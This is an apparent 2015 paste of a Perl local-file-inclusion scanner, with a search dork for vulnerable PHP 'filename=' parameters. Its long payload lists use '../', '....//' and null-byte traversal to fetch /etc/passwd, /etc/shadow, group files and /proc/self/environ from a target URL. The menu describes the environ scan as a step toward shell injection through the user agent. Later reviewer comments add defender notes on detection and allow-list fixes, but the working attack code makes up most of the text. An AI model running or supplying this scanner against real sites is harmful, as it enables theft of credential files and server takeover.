Kyfx

/etc/passwd exploit script

Nov 20th, 2015
  1. Dork:
  2. 2.) =autohtml.php?filename=
  3.  
  4. 1.) php?filename=aboutus.php
  5.  
  6.  
  7.  
  8. #!/usr/bin/perl
  9. #1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
  10. #0 _ __ __ __ 1
  11. #1 /' \ __ /'__`\ /\ \__ /'__`\ 0
  12. #0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
  13. #1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
  14. #0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
  15. #1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
  16. #0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
  17. #1 \ \____/ >> Exploit database separated by exploit 0
  18. #0 \/___/ type (local, remote, DoS, etc.) 1
  19. #1 1
  20. #0 [+] Site : Kalachnikov.com 0
  21. #1 [+] Support e-mail : [email protected] 1
  22. #0 0
  23. #1 ######################################### 1
  24. #0 Arsan - Kalachnikov_TN 1
  25. #1 ######################################### 0
  26. #0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
  27.  
  28. use HTTP::Request;
  29. use LWP::UserAgent;
  # Console setup, banner, and menu dispatch for the scanner.
  # NOTE(review): no `use strict` / `use warnings` appears in this listing, so every
  # variable below is a package global and barewords are accepted silently.
  # The three system() strings are handed to the shell unchanged; "title", "color"
  # and "cls" look like Windows cmd built-ins — presumably written for a Windows console.
  30. system("title The Black Devils");
  31. system("color 1e");
  32. system ("cls");
  33. print " |=======================================================|\n";
  34. print " |= [!] Name : LFI Scanner Ver 1.0.0 Perl =|\n";
  35. print " |= [!] Author : Arsan - Kalachnikov_TN =|\n";
  36. print " |= [!] Mail: Arsan48(at)Kalachnikov(dot)com =|\n";
  37. print " |=======================================================|\n";
  38. print "\n\n";
  39. sleep (1);
  40. print "\t\t\t\t WELCOME\n";
  41. print "\n\n";
  # Label used as a goto target; the else branch at the end of this run jumps back here.
  42. menu:;
  43. print "\tMenu:\n";
  44. print "\t ID [1] => Passwd,Log";
  45. print "\t[Scan Files Of /etc/ Directory]\n";
  46. print "\t ID [2] =>Environ";
  47. print "\t[Scan Environ File For Inject Shell By U-Agent]\n";
  48. print"\n";
  49. print "\t\t Select ID For Start Scanner :";
  # `<>` reads one line from the files named in @ARGV, or from STDIN when none are given.
  50. $menu = <>;
  # Unanchored match: any input that contains the digit 1 selects the /etc/ section.
  51. if ($menu =~ /1/){
  52. goto lfi;
  53. }
  # Separate if/else, reached only when the input held no "1": "2" anywhere selects
  # the environ section, anything else re-displays the menu.
  54. if ($menu =~ /2/){
  55. goto env;
  56. }
  57. else {
  58. print"\n\n";
  59. print "\t\tUnknow Command\n";
  60. goto menu;
  61. };
  62.  
  63.  
  # /etc/ section entry point: asks for the base URL that each candidate path is
  # appended to. The prompt's own example ends in "?page=", i.e. a query parameter
  # that selects a file on the server side.
  64. lfi:;
  65. print "\n\n";
  66. print "\t\t\tWelcome To /etc/ Section With New Method\n\n";
  67. print "\t Insert Target (ex: http://www.xxx.com/index.php?page=)\n";
  68. print "\t Target :";
  69. $host=<STDIN>;
  70. chomp($host);
  # Prefixes "http://" unless that literal substring already occurs somewhere in the
  # input (the match is unanchored). No other validation of the string happens here.
  71. if($host !~ /http:\/\//) { $host = "http://$host"; };
  72.  
  73. print "\n\n";
  74. print "\t\t*-*-*-*-*-* Start Scanning /etc/ Section *-*-*-*-*-*\n";
  75. print "\n\n";
  # Fixed list of candidate paths; the loop after this list appends each one verbatim
  # to the target URL. Three families are visible: "../" repeated N times, "....//"
  # repeated N times, and both again with a trailing "%00". Targets are passwd, shadow
  # and group under /etc, plus /etc/security/{group,passwd,user} (AIX locations, as far
  # as this reviewer knows — confirm).
  # Defender notes:
  #  - "....//" becomes "../" when a filter deletes "../" a single time, so one-pass
  #    substring stripping is not an adequate control. Map the parameter to an
  #    allow-list of known files rather than filtering the path text.
  #  - "%00" aims at null-byte truncation of a suffix the application appends;
  #    presumably the targets are PHP pages, and PHP has rejected NUL bytes in paths
  #    since 5.3.4. Seeing it in request logs is still a clear probe indicator.
  #  - In access logs this list shows up as a burst of GETs from one client whose
  #    parameter value grows in "../" depth from request to request.
  76. @lfi = ('../etc/passwd',
  77. '../../etc/passwd',
  78. '../../../etc/passwd',
  79. '../../../../etc/passwd',
  80. '../../../../../etc/passwd',
  81. '../../../../../../etc/passwd',
  82. '../../../../../../../etc/passwd',
  83. '../../../../../../../../etc/passwd',
  84. '../../../../../../../../../etc/passwd',
  85. '../../../../../../../../../../etc/passwd',
  86. '../../../../../../../../../../../etc/passwd',
  87. '../../../../../../../../../../../../etc/passwd',
  88. '../../../../../../../../../../../../../etc/passwd',
  89. '../../../../../../../../../../../../../../etc/passwd',
  90. '../../../../../../../../../../../../../../../../etc/passwd',
  91. '....//etc/passwd',
  92. '....//....//etc/passwd',
  93. '....//....//....//etc/passwd',
  94. '....//....//....//....//etc/passwd',
  95. '....//....//....//....//....//etc/passwd',
  96. '....//....//....//....//....//....//etc/passwd',
  97. '....//....//....//....//....//....//....//etc/passwd',
  98. '....//....//....//....//....//....//....//....//etc/passwd',
  99. '....//....//....//....//....//....//....//....//....//etc/passwd',
  100. '....//....//....//....//....//....//....//....//....//....//etc/passwd',
  101. '../../etc/passwd%00',
  102. '../../../etc/passwd%00',
  103. '../../../../etc/passwd%00',
  104. '../../../../../etc/passwd%00',
  105. '../../../../../../etc/passwd%00',
  106. '../../../../../../../etc/passwd%00',
  107. '../../../../../../../../etc/passwd%00',
  108. '../../../../../../../../../etc/passwd%00',
  109. '../../../../../../../../../../etc/passwd%00',
  110. '../../../../../../../../../../../etc/passwd%00',
  111. '../../../../../../../../../../../../etc/passwd%00',
  112. '../../../../../../../../../../../../../etc/passwd%00',
  113. '../../../../../../../../../../../../../../etc/passwd%00',
  114. '../../../../../../../../../../../../../../../../etc/passwd%00',
  115. '....//etc/passwd%00',
  116. '....//....//etc/passwd%00',
  117. '....//....//....//etc/passwd%00',
  118. '....//....//....//....//etc/passwd%00',
  119. '....//....//....//....//....//etc/passwd%00',
  120. '....//....//....//....//....//....//etc/passwd%00',
  121. '....//....//....//....//....//....//....//etc/passwd%00',
  122. '....//....//....//....//....//....//....//....//etc/passwd%00',
  123. '....//....//....//....//....//....//....//....//....//etc/passwd%00',
  124. '....//....//....//....//....//....//....//....//....//....//etc/passwd%00',
  125. '../etc/shadow',
  126. '../../etc/shadow',
  127. '../../../etc/shadow',
  128. '../../../../etc/shadow',
  129. '../../../../../etc/shadow',
  130. '../../../../../../etc/shadow',
  131. '../../../../../../../etc/shadow',
  132. '../../../../../../../../etc/shadow',
  133. '../../../../../../../../../etc/shadow',
  134. '../../../../../../../../../../etc/shadow',
  135. '../../../../../../../../../../../etc/shadow',
  136. '../../../../../../../../../../../../etc/shadow',
  137. '../../../../../../../../../../../../../etc/shadow',
  138. '../../../../../../../../../../../../../../etc/shadow',
  139. '../etc/shadow%00',
  140. '../../etc/shadow%00',
  141. '../../../etc/shadow%00',
  142. '../../../../etc/shadow%00',
  143. '../../../../../etc/shadow%00',
  144. '../../../../../../etc/shadow%00',
  145. '../../../../../../../etc/shadow%00',
  146. '../../../../../../../../etc/shadow%00',
  147. '../../../../../../../../../etc/shadow%00',
  148. '../../../../../../../../../../etc/shadow%00',
  149. '../../../../../../../../../../../etc/shadow%00',
  150. '../../../../../../../../../../../../etc/shadow%00',
  151. '../../../../../../../../../../../../../etc/shadow%00',
  152. '../../../../../../../../../../../../../../etc/shadow%00',
  153. '../etc/group',
  154. '../../etc/group',
  155. '../../../etc/group',
  156. '../../../../etc/group',
  157. '../../../../../etc/group',
  158. '../../../../../../etc/group',
  159. '../../../../../../../etc/group',
  160. '../../../../../../../../etc/group',
  161. '../../../../../../../../../etc/group',
  162. '../../../../../../../../../../etc/group',
  163. '../../../../../../../../../../../etc/group',
  164. '../../../../../../../../../../../../etc/group',
  165. '../../../../../../../../../../../../../etc/group',
  166. '../../../../../../../../../../../../../../etc/group',
  167. '../etc/group%00',
  168. '../../etc/group%00',
  169. '../../../etc/group%00',
  170. '../../../../etc/group%00',
  171. '../../../../../etc/group%00',
  172. '../../../../../../etc/group%00',
  173. '../../../../../../../etc/group%00',
  174. '../../../../../../../../etc/group%00',
  175. '../../../../../../../../../etc/group%00',
  176. '../../../../../../../../../../etc/group%00',
  177. '../../../../../../../../../../../etc/group%00',
  178. '../../../../../../../../../../../../etc/group%00',
  179. '../../../../../../../../../../../../../etc/group%00',
  180. '../../../../../../../../../../../../../../etc/group%00',
  181. '../etc/security/group',
  182. '../../etc/security/group',
  183. '../../../etc/security/group',
  184. '../../../../etc/security/group',
  185. '../../../../../etc/security/group',
  186. '../../../../../../etc/security/group',
  187. '../../../../../../../etc/security/group',
  188. '../../../../../../../../etc/security/group',
  189. '../../../../../../../../../etc/security/group',
  190. '../../../../../../../../../../etc/security/group',
  191. '../../../../../../../../../../../etc/security/group',
  192. '../etc/security/group%00',
  193. '../../etc/security/group%00',
  194. '../../../etc/security/group%00',
  195. '../../../../etc/security/group%00',
  196. '../../../../../etc/security/group%00',
  197. '../../../../../../etc/security/group%00',
  198. '../../../../../../../etc/security/group%00',
  199. '../../../../../../../../etc/security/group%00',
  200. '../../../../../../../../../etc/security/group%00',
  201. '../../../../../../../../../../etc/security/group%00',
  202. '../../../../../../../../../../../etc/security/group%00',
  203. '../etc/security/passwd',
  204. '../../etc/security/passwd',
  205. '../../../etc/security/passwd',
  206. '../../../../etc/security/passwd',
  207. '../../../../../etc/security/passwd',
  208. '../../../../../../etc/security/passwd',
  209. '../../../../../../../etc/security/passwd',
  210. '../../../../../../../../etc/security/passwd',
  211. '../../../../../../../../../etc/security/passwd',
  212. '../../../../../../../../../../etc/security/passwd',
  213. '../../../../../../../../../../../etc/security/passwd',
  214. '../../../../../../../../../../../../etc/security/passwd',
  215. '../../../../../../../../../../../../../etc/security/passwd',
  216. '../../../../../../../../../../../../../../etc/security/passwd',
  217. '../etc/security/passwd%00',
  218. '../../etc/security/passwd%00',
  219. '../../../etc/security/passwd%00',
  220. '../../../../etc/security/passwd%00',
  221. '../../../../../etc/security/passwd%00',
  222. '../../../../../../etc/security/passwd%00',
  223. '../../../../../../../etc/security/passwd%00',
  224. '../../../../../../../../etc/security/passwd%00',
  225. '../../../../../../../../../etc/security/passwd%00',
  226. '../../../../../../../../../../etc/security/passwd%00',
  227. '../../../../../../../../../../../etc/security/passwd%00',
  228. '../../../../../../../../../../../../etc/security/passwd%00',
  229. '../../../../../../../../../../../../../etc/security/passwd%00',
  230. '../../../../../../../../../../../../../../etc/security/passwd%00',
  231. '../etc/security/user',
  232. '../../etc/security/user',
  233. '../../../etc/security/user',
  234. '../../../../etc/security/user',
  235. '../../../../../etc/security/user',
  236. '../../../../../../etc/security/user',
  237. '../../../../../../../etc/security/user',
  238. '../../../../../../../../etc/security/user',
  239. '../../../../../../../../../etc/security/user',
  240. '../../../../../../../../../../etc/security/user',
  241. '../../../../../../../../../../../etc/security/user',
  242. '../../../../../../../../../../../../etc/security/user',
  243. '../../../../../../../../../../../../../etc/security/user',
  244. '../etc/security/user%00',
  245. '../../etc/security/user%00',
  246. '../../../etc/security/user%00',
  247. '../../../../etc/security/user%00',
  248. '../../../../../etc/security/user%00',
  249. '../../../../../../etc/security/user%00',
  250. '../../../../../../../etc/security/user%00',
  251. '../../../../../../../../etc/security/user%00',
  252. '../../../../../../../../../etc/security/user%00',
  253. '../../../../../../../../../../etc/security/user%00',
  254. '../../../../../../../../../../../etc/security/user%00',
  255. '../../../../../../../../../../../../etc/security/user%00',
  256. '../../../../../../../../../../../../../etc/security/user%00');
  257.  
  258.  
  # Issues one GET per entry of @lfi against $host.<entry> and prints a verdict line.
  259. foreach $scan(@lfi){
  260.  
  261. $url = $host.$scan;
  262. $request = HTTP::Request->new(GET=>$url);
  # A new LWP::UserAgent is constructed on every iteration with no arguments, so no
  # agent string, timeout or extra header is set and the library defaults apply.
  263. $useragent = LWP::UserAgent->new();
  264.  
  265. $response = $useragent->request($request);
  # The verdict rests only on a successful response whose body contains "root:x:".
  # `Vulnerability` is a bareword; with no `use strict` in the listing Perl treats it
  # as the string "Vulnerability".
  # NOTE(review): every other outcome (error status, failed connection, a file that
  # lacks that marker) prints "Not Infected", so that label is not evidence that the
  # target is safe.
  266. if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;}
  267. else { $msg = "Not Infected";}
  268. print "$scan..........[$msg]\n";
  269. }
  # No exit follows this loop, so control continues into the env: section that comes
  # next in the file.
  # Environ section entry point (goto target for menu ID 2). Prompts for the base URL
  # again and overwrites $host with the new value.
  270. env:;
  271. print "\n\n";
  272. print "\t\t\tWelcom To Environ Section\n\n";
  273. print "\t Insert Target (ex: http://www.site.com/index.php?page=)\n";
  274. print "\t Target :";
  275. $host=<STDIN>;
  276. chomp($host);
  # Same unanchored "http://" substring test as in the /etc/ section; no other
  # validation of the target string.
  277. if($host !~ /http:\/\//) { $host = "http://$host"; };
  278.  
  279. print "\n\n";
  280. print "\t\t*-*-*-*-*-* Start Scanning Environ *-*-*-*-*-*\n";
  281. print "\n\n";
  282.  
  # Candidate paths for /proc/self/environ: "../" repeated 1 to 14 times, then the same
  # set with a trailing "%00".
  # Defender note: on Linux this file holds the environment of the process that reads
  # it. Where the web process exposes request headers as HTTP_* variables, an include
  # that can reach it pulls request-controlled text into included content. The fix
  # belongs at the include (allow-list the selectable files), not at the headers.
  283. @env = ('../proc/self/environ',
  284. '../../proc/self/environ',
  285. '../../../proc/self/environ',
  286. '../../../../proc/self/environ',
  287. '../../../../../proc/self/environ',
  288. '../../../../../../proc/self/environ',
  289. '../../../../../../../proc/self/environ',
  290. '../../../../../../../../proc/self/environ',
  291. '../../../../../../../../../proc/self/environ',
  292. '../../../../../../../../../../proc/self/environ',
  293. '../../../../../../../../../../../proc/self/environ',
  294. '../../../../../../../../../../../../proc/self/environ',
  295. '../../../../../../../../../../../../../proc/self/environ',
  296. '../../../../../../../../../../../../../../proc/self/environ',
  297. '../proc/self/environ%00',
  298. '../../proc/self/environ%00',
  299. '../../../proc/self/environ%00',
  300. '../../../../proc/self/environ%00',
  301. '../../../../../proc/self/environ%00',
  302. '../../../../../../proc/self/environ%00',
  303. '../../../../../../../proc/self/environ%00',
  304. '../../../../../../../../proc/self/environ%00',
  305. '../../../../../../../../../proc/self/environ%00',
  306. '../../../../../../../../../../proc/self/environ%00',
  307. '../../../../../../../../../../../proc/self/environ%00',
  308. '../../../../../../../../../../../../proc/self/environ%00',
  309. '../../../../../../../../../../../../../proc/self/environ%00',
  310. '../../../../../../../../../../../../../../proc/self/environ%00');
  311.  
  # Issues one GET per entry of @env against $host.<entry> and prints a verdict line.
  # Despite the menu text, this loop only reads: it sets no request headers and sends
  # no body.
  312. foreach $scan_env(@env){
  313.  
  314. $url = $host.$scan_env;
  315. $request = HTTP::Request->new(GET=>$url);
  # Fresh default-configured user agent per request, as in the /etc/ loop.
  316. $useragent = LWP::UserAgent->new();
  317.  
  318. $response = $useragent->request($request);
  # Positive only when the response is successful and the body contains both
  # "HTTP_ACCEPT" and "HTTP_HOST" — presumably taken as a sign that a CGI-style
  # environment block was returned. Any other outcome, including transport errors,
  # is printed as "Not Infected".
  # `Vulnerability` is a bareword that Perl treats as a string without `use strict`.
  319. if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;}
  320. else { $msg = "Not Infected";}
  321. print "$scan_env..........[$msg]\n";
  322. }